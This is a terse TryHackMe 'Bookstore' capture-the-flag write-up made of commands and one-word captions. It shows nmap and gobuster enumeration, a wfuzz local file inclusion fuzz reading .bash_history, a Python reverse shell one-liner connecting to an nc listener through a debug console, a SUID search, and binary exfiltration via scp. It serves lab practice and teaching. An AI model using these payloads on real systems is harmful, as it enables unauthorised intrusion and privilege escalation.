Bookstore — TryHackMe — WriteUp

nmap -A -T4 -v -p- <ip>

website
page source of /books
decode
decode
rabbit hole
/login
page source
port 5000

gobuster dir -u http://<ip>:5000 -w /path-to-wordlist

gobuster
robots.txt
/console
/api
LFI

wfuzz -c -f bookstore.txt -u "http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history" -w /path-to-wordlist -t 100 2>/dev/null --hc 404

wfuzz

http://<ip>:5000/api/v1/resources/books?the-parameter=.bash_history

LFI
/console

nc -lvnp 4444

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

shell
user flag
sudo -l

find / -perm -u=s 2>/dev/null

SUID

scp try-harder user-name@<ip>:/home/username

ghidra
formula

HAPPY HACKING
